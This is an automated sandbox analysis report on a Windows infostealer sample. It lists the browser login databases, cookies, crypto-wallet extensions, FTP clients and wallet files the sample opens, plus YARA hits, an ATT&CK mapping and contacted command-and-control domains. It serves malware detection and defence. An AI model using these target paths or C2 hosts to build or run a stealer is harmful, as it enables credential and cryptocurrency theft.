                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqliteJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cert9.dbJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\formhistory.sqliteJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.dbJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\logins.jsonJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.jsJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLOJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLOJump to behavior
                Source: Yara matchFile source: 00000000.00000003.2067395256.00000000014C3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2096219412.00000000014C3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2100391243.0000000001484000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2100238097.0000000001484000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: P0SJULJxI0.exe PID: 5272, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: Process Memory Space: P0SJULJxI0.exe PID: 5272, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                Windows Management Instrumentation                		1
                DLL Side-Loading                		1
                Process Injection                		44
                Virtualization/Sandbox Evasion                		2
                OS Credential Dumping                		1
                Query Registry                		Remote Services1
                Archive Collected Data                		11
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                PowerShell                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		1
                Process Injection                		LSASS Memory851
                Security Software Discovery                		Remote Desktop Protocol41
                Data from Local System                		2
                Non-Application Layer Protocol                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
                Deobfuscate/Decode Files or Information                		Security Account Manager44
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive113
                Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
                Obfuscated Files or Information                		NTDS2
                Process Discovery                		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
                Software Packing                		LSA Secrets1
                Application Window Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading                		Cached Domain Credentials1
                File and Directory Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync223
                System Information Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1580880 Sample: P0SJULJxI0.exe Startdate: 26/12/2024 Architecture: WINDOWS Score: 100 10 mindhandru.buzz 2->10 14 Suricata IDS alerts for network traffic 2->14 16 Found malware configuration 2->16 18 Antivirus detection for URL or domain 2->18 20 9 other signatures 2->20 6 P0SJULJxI0.exe 2->6         started        signatures3 process4 dnsIp5 12 mindhandru.buzz 172.67.165.185, 443, 49704, 49705 CLOUDFLARENETUS United States 6->12 22 Detected unpacking (changes PE section rights) 6->22 24 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 6->24 26 Query firmware table information (likely to detect VMs) 6->26 28 10 other signatures 6->28 signatures6

                Screenshots

                Download Video

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                P0SJULJxI0.exe53%VirustotalBrowse
                P0SJULJxI0.exe61%ReversingLabsWin32.Infostealer.Tinba
                P0SJULJxI0.exe100%AviraTR/Crypt.TPM.Gen
                P0SJULJxI0.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://mindhandru.buzz/c)0%Avira URL Cloudsafe
                https://mindhandru.buzz/ste0%Avira URL Cloudsafe
                https://mindhandru.buzz/MPh0%Avira URL Cloudsafe
                https://mindhandru.buzz:443/api100%Avira URL Cloudmalware
                https://mindhandru.buzz/pi0%Avira URL Cloudsafe
                https://mindhandru.buzz/apiX/0%Avira URL Cloudsafe
                https://mindhandru.buzz/pid0%Avira URL Cloudsafe
                https://mindhandru.buzz/s0%Avira URL Cloudsafe
                https://mindhandru.buzz/W/0%Avira URL Cloudsafe
                https://mindhandru.buzz/d0%Avira URL Cloudsafe
                https://mindhandru.buzz/;.C0%Avira URL Cloudsafe
                https://mindhandru.buzz/api;100%Avira URL Cloudmalware
                https://mindhandru.buzz/apis0%Avira URL Cloudsafe
                https://mindhandru.buzz/apih&0%Avira URL Cloudsafe

                Domains and IPs

                Download Network PCAP: filteredfull

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                mindhandru.buzz
                		172.67.165.185
                		truefalse
                  		high

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  scentniej.buzzfalse
                    		high
                    hummskitnj.buzzfalse
                      		high
                      mindhandru.buzzfalse
                        		high
                        https://mindhandru.buzz/apifalse
                          		high
                          rebuildeso.buzzfalse
                            		high
                            appliacnesot.buzzfalse
                              		high
                              screwamusresz.buzzfalse
                                		high
                                cashfuzysao.buzzfalse
                                  		high
                                  inherineau.buzzfalse
                                    		high
                                    prisonyfork.buzzfalse
                                      		high
                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://duckduckgo.com/chrome_newtabP0SJULJxI0.exe, 00000000.00000003.1626718719.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.1626551778.0000000005C5E000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.1626630650.0000000005C5B000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
